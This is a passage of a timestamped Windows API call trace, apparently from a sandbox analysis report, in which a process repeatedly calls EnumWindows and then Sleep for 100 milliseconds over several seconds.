EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.518] Sleep (dwMilliseconds=0x64) [0276.547] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.547] Sleep (dwMilliseconds=0x64) [0276.590] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.590] Sleep (dwMilliseconds=0x64) [0276.636] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.637] Sleep (dwMilliseconds=0x64) [0276.644] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.645] Sleep (dwMilliseconds=0x64) [0276.682] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.683] Sleep (dwMilliseconds=0x64) [0276.725] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.726] Sleep (dwMilliseconds=0x64) [0276.758] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.759] Sleep (dwMilliseconds=0x64) [0276.766] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.767] Sleep (dwMilliseconds=0x64) [0276.806] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.807] Sleep (dwMilliseconds=0x64) [0276.848] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.848] Sleep (dwMilliseconds=0x64) [0276.857] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.858] Sleep (dwMilliseconds=0x64) [0276.891] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.891] Sleep (dwMilliseconds=0x64) [0276.934] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.935] Sleep (dwMilliseconds=0x64) [0276.955] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.955] Sleep (dwMilliseconds=0x64) [0276.976] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0276.976] Sleep (dwMilliseconds=0x64) [0277.016] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.016] Sleep (dwMilliseconds=0x64) [0277.067] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.068] Sleep (dwMilliseconds=0x64) [0277.079] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.080] Sleep (dwMilliseconds=0x64) [0277.121] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.122] Sleep (dwMilliseconds=0x64) [0277.163] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.163] Sleep (dwMilliseconds=0x64) [0277.283] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.283] Sleep (dwMilliseconds=0x64) [0277.312] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.312] Sleep (dwMilliseconds=0x64) [0277.357] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.358] Sleep (dwMilliseconds=0x64) [0277.390] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.390] Sleep (dwMilliseconds=0x64) [0277.401] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.401] Sleep (dwMilliseconds=0x64) [0277.440] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.441] Sleep (dwMilliseconds=0x64) [0277.483] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.483] Sleep (dwMilliseconds=0x64) [0277.502] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.502] Sleep (dwMilliseconds=0x64) [0277.533] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.533] Sleep (dwMilliseconds=0x64) [0277.573] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.573] Sleep (dwMilliseconds=0x64) [0277.616] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.616] Sleep (dwMilliseconds=0x64) [0277.624] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.625] Sleep (dwMilliseconds=0x64) [0277.665] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.666] Sleep (dwMilliseconds=0x64) [0277.704] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.705] Sleep (dwMilliseconds=0x64) [0277.745] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.745] Sleep (dwMilliseconds=0x64) [0277.757] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.758] Sleep (dwMilliseconds=0x64) [0277.800] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.800] Sleep (dwMilliseconds=0x64) [0277.845] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.845] Sleep (dwMilliseconds=0x64) [0277.868] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.870] Sleep (dwMilliseconds=0x64) [0277.890] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.890] Sleep (dwMilliseconds=0x64) [0277.931] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.932] Sleep (dwMilliseconds=0x64) [0277.971] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.971] Sleep (dwMilliseconds=0x64) [0277.984] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0277.984] Sleep (dwMilliseconds=0x64) [0278.017] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.017] Sleep (dwMilliseconds=0x64) [0278.074] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.074] Sleep (dwMilliseconds=0x64) [0278.119] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.119] Sleep (dwMilliseconds=0x64) [0278.124] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.125] Sleep (dwMilliseconds=0x64) [0278.165] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.165] Sleep (dwMilliseconds=0x64) [0278.230] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.231] Sleep (dwMilliseconds=0x64) [0278.269] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.269] Sleep (dwMilliseconds=0x64) [0278.275] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.275] Sleep (dwMilliseconds=0x64) [0278.317] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.317] Sleep (dwMilliseconds=0x64) [0278.358] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.358] Sleep (dwMilliseconds=0x64) [0278.412] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.412] Sleep (dwMilliseconds=0x64) [0278.439] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.439] Sleep (dwMilliseconds=0x64) [0278.480] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.480] Sleep (dwMilliseconds=0x64) [0278.511] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.512] Sleep (dwMilliseconds=0x64) [0278.530] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.531] Sleep (dwMilliseconds=0x64) [0278.572] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.573] Sleep (dwMilliseconds=0x64) [0278.614] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.615] Sleep (dwMilliseconds=0x64) [0278.639] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.640] Sleep (dwMilliseconds=0x64) [0278.662] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.662] Sleep (dwMilliseconds=0x64) [0278.699] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.700] Sleep (dwMilliseconds=0x64) [0278.755] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.756] Sleep (dwMilliseconds=0x64) [0278.765] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.766] Sleep (dwMilliseconds=0x64) [0278.798] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.798] Sleep (dwMilliseconds=0x64) [0278.848] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.849] Sleep (dwMilliseconds=0x64) [0278.877] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.878] Sleep (dwMilliseconds=0x64) [0278.920] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.920] Sleep (dwMilliseconds=0x64) [0278.962] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.962] Sleep (dwMilliseconds=0x64) [0278.966] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0278.967] Sleep (dwMilliseconds=0x64) [0279.002] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.003] Sleep (dwMilliseconds=0x64) [0279.057] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.058] Sleep (dwMilliseconds=0x64) [0279.098] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.098] Sleep (dwMilliseconds=0x64) [0279.103] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.104] Sleep (dwMilliseconds=0x64) [0279.142] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.143] Sleep (dwMilliseconds=0x64) [0279.192] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.192] Sleep (dwMilliseconds=0x64) [0279.260] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.261] Sleep (dwMilliseconds=0x64) [0279.272] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.273] Sleep (dwMilliseconds=0x64) [0279.315] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.315] Sleep (dwMilliseconds=0x64) [0279.356] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.357] Sleep (dwMilliseconds=0x64) [0279.387] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.387] Sleep (dwMilliseconds=0x64) [0279.401] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.402] Sleep (dwMilliseconds=0x64) [0279.442] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.442] Sleep (dwMilliseconds=0x64) [0279.488] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.488] Sleep (dwMilliseconds=0x64) [0279.507] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.507] Sleep (dwMilliseconds=0x64) [0279.513] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.513] Sleep (dwMilliseconds=0x64) [0279.540] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.541] Sleep (dwMilliseconds=0x64) [0279.657] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.658] Sleep (dwMilliseconds=0x64) [0279.699] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.699] Sleep (dwMilliseconds=0x64) [0279.703] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.703] Sleep (dwMilliseconds=0x64) [0279.742] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.742] Sleep (dwMilliseconds=0x64) [0279.780] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.781] Sleep (dwMilliseconds=0x64) [0279.790] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.791] Sleep (dwMilliseconds=0x64) [0279.825] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.826] Sleep (dwMilliseconds=0x64) [0279.867] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.868] Sleep (dwMilliseconds=0x64) [0279.885] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.886] Sleep (dwMilliseconds=0x64) [0279.911] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.911] Sleep (dwMilliseconds=0x64) [0279.949] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.949] Sleep (dwMilliseconds=0x64) [0279.974] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.975] Sleep (dwMilliseconds=0x64) [0279.991] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0279.992] Sleep (dwMilliseconds=0x64) [0280.035] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.035] Sleep (dwMilliseconds=0x64) [0280.086] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.086] Sleep (dwMilliseconds=0x64) [0280.097] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.098] Sleep (dwMilliseconds=0x64) [0280.136] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.137] Sleep (dwMilliseconds=0x64) [0280.176] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.177] Sleep (dwMilliseconds=0x64) [0280.238] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.239] Sleep (dwMilliseconds=0x64) [0280.244] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.245] Sleep (dwMilliseconds=0x64) [0280.283] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.283] Sleep (dwMilliseconds=0x64) [0280.321] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.321] Sleep (dwMilliseconds=0x64) [0280.332] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.332] Sleep (dwMilliseconds=0x64) [0280.363] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.364] Sleep (dwMilliseconds=0x64) [0280.402] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.402] Sleep (dwMilliseconds=0x64) [0280.425] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.425] Sleep (dwMilliseconds=0x64) [0280.447] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.448] Sleep (dwMilliseconds=0x64) [0280.487] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.487] Sleep (dwMilliseconds=0x64) [0280.531] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.531] Sleep (dwMilliseconds=0x64) [0280.542] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.542] Sleep (dwMilliseconds=0x64) [0280.585] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.624] Sleep (dwMilliseconds=0x64) [0280.649] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.650] Sleep (dwMilliseconds=0x64) [0280.670] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.671] Sleep (dwMilliseconds=0x64) [0280.707] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.708] Sleep (dwMilliseconds=0x64) [0280.749] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.749] Sleep (dwMilliseconds=0x64) [0280.765] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.766] Sleep (dwMilliseconds=0x64) [0280.806] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.806] Sleep (dwMilliseconds=0x64) [0280.845] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.845] Sleep (dwMilliseconds=0x64) [0280.858] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.858] Sleep (dwMilliseconds=0x64) [0280.890] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.890] Sleep (dwMilliseconds=0x64) [0280.930] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.931] Sleep (dwMilliseconds=0x64) [0280.959] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.960] Sleep (dwMilliseconds=0x64) [0280.971] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0280.972] Sleep (dwMilliseconds=0x64) [0281.010] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.011] Sleep (dwMilliseconds=0x64) [0281.068] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.069] Sleep (dwMilliseconds=0x64) [0281.082] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.082] Sleep (dwMilliseconds=0x64) [0281.120] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.120] Sleep (dwMilliseconds=0x64) [0281.161] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.162] Sleep (dwMilliseconds=0x64) [0281.221] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.221] Sleep (dwMilliseconds=0x64) [0281.231] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.232] Sleep (dwMilliseconds=0x64) [0281.265] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.265] Sleep (dwMilliseconds=0x64) [0281.303] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.304] Sleep (dwMilliseconds=0x64) [0281.349] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.349] Sleep (dwMilliseconds=0x64) [0281.360] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.361] Sleep (dwMilliseconds=0x64) [0281.400] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.400] Sleep (dwMilliseconds=0x64) [0281.437] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.437] Sleep (dwMilliseconds=0x64) [0281.457] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.457] Sleep (dwMilliseconds=0x64) [0281.492] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.492] Sleep (dwMilliseconds=0x64) [0281.530] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.530] Sleep (dwMilliseconds=0x64) [0281.579] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.579] Sleep (dwMilliseconds=0x64) [0281.582] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.583] Sleep (dwMilliseconds=0x64) [0281.625] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.625] Sleep (dwMilliseconds=0x64) [0281.665] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.665] Sleep (dwMilliseconds=0x64) [0281.704] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.705] Sleep (dwMilliseconds=0x64) [0281.711] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.711] Sleep (dwMilliseconds=0x64) [0281.751] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.752] Sleep (dwMilliseconds=0x64) [0281.792] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.793] Sleep (dwMilliseconds=0x64) [0281.825] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.825] Sleep (dwMilliseconds=0x64) [0281.835] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.835] Sleep (dwMilliseconds=0x64) [0281.874] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.875] Sleep (dwMilliseconds=0x64) [0281.915] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.915] Sleep (dwMilliseconds=0x64) [0281.928] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.928] Sleep (dwMilliseconds=0x64) [0281.990] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0281.990] Sleep (dwMilliseconds=0x64) [0282.032] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.032] Sleep (dwMilliseconds=0x64) [0282.059] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.059] Sleep (dwMilliseconds=0x64) [0282.081] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.081] Sleep (dwMilliseconds=0x64) [0282.120] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.120] Sleep (dwMilliseconds=0x64) [0282.161] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.162] Sleep (dwMilliseconds=0x64) [0282.169] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.170] Sleep (dwMilliseconds=0x64) [0282.219] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.219] Sleep (dwMilliseconds=0x64) [0282.256] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.257] Sleep (dwMilliseconds=0x64) [0282.275] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.275] Sleep (dwMilliseconds=0x64) [0282.301] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.302] Sleep (dwMilliseconds=0x64) [0282.339] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.340] Sleep (dwMilliseconds=0x64) [0282.369] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.369] Sleep (dwMilliseconds=0x64) [0282.383] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.383] Sleep (dwMilliseconds=0x64) [0282.423] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.423] Sleep (dwMilliseconds=0x64) [0282.455] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.455] Sleep (dwMilliseconds=0x64) [0282.462] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.462] Sleep (dwMilliseconds=0x64) [0282.504] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.504] Sleep (dwMilliseconds=0x64) [0282.543] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.543] Sleep (dwMilliseconds=0x64) [0282.547] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.548] Sleep (dwMilliseconds=0x64) [0282.600] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.601] Sleep (dwMilliseconds=0x64) [0282.640] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.641] Sleep (dwMilliseconds=0x64) [0282.655] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.656] Sleep (dwMilliseconds=0x64) [0282.686] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.686] Sleep (dwMilliseconds=0x64) [0282.726] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.727] Sleep (dwMilliseconds=0x64) [0282.750] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.750] Sleep (dwMilliseconds=0x64) [0282.771] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.771] Sleep (dwMilliseconds=0x64) [0282.810] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.810] Sleep (dwMilliseconds=0x64) [0282.839] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.839] Sleep (dwMilliseconds=0x64) [0282.849] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.850] Sleep (dwMilliseconds=0x64) [0282.887] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.887] Sleep (dwMilliseconds=0x64) [0282.924] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.924] Sleep (dwMilliseconds=0x64) [0282.929] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.929] Sleep (dwMilliseconds=0x64) [0282.968] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0282.968] Sleep (dwMilliseconds=0x64) [0283.011] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.012] Sleep (dwMilliseconds=0x64) [0283.031] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.031] Sleep (dwMilliseconds=0x64) [0283.063] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.064] Sleep (dwMilliseconds=0x64) [0283.107] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.108] Sleep (dwMilliseconds=0x64) [0283.296] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.297] Sleep (dwMilliseconds=0x64) [0283.306] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.307] Sleep (dwMilliseconds=0x64) [0283.341] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.342] Sleep (dwMilliseconds=0x64) [0283.381] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.381] Sleep (dwMilliseconds=0x64) [0283.417] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.418] Sleep (dwMilliseconds=0x64) [0283.427] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.428] Sleep (dwMilliseconds=0x64) [0283.480] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.481] Sleep (dwMilliseconds=0x64) [0283.525] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.525] Sleep (dwMilliseconds=0x64) [0283.551] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.552] Sleep (dwMilliseconds=0x64) [0283.587] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.588] Sleep (dwMilliseconds=0x64) [0283.641] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.641] Sleep (dwMilliseconds=0x64) [0283.685] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.685] Sleep (dwMilliseconds=0x64) [0283.694] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.694] Sleep (dwMilliseconds=0x64) [0283.734] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.735] Sleep (dwMilliseconds=0x64) [0283.772] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.772] Sleep (dwMilliseconds=0x64) [0283.785] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.786] Sleep (dwMilliseconds=0x64) [0283.814] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.814] Sleep (dwMilliseconds=0x64) [0283.853] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.853] Sleep (dwMilliseconds=0x64) [0283.871] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.872] Sleep (dwMilliseconds=0x64) [0283.893] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.893] Sleep (dwMilliseconds=0x64) [0283.934] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.934] Sleep (dwMilliseconds=0x64) [0283.961] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.962] Sleep (dwMilliseconds=0x64) [0283.977] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0283.978] Sleep (dwMilliseconds=0x64) [0284.018] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.018] Sleep (dwMilliseconds=0x64) [0284.071] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.071] Sleep (dwMilliseconds=0x64) [0284.093] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.094] Sleep (dwMilliseconds=0x64) [0284.116] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.116] Sleep (dwMilliseconds=0x64) [0284.155] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.156] Sleep (dwMilliseconds=0x64) [0284.217] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.218] Sleep (dwMilliseconds=0x64) [0284.225] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.226] Sleep (dwMilliseconds=0x64) [0284.266] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.267] Sleep (dwMilliseconds=0x64) [0284.345] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.345] Sleep (dwMilliseconds=0x64) [0284.386] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.387] Sleep (dwMilliseconds=0x64) [0284.394] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.395] Sleep (dwMilliseconds=0x64) [0284.426] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0284.426] Sleep (dwMilliseconds=0x64) [0284.466] EnumWindows 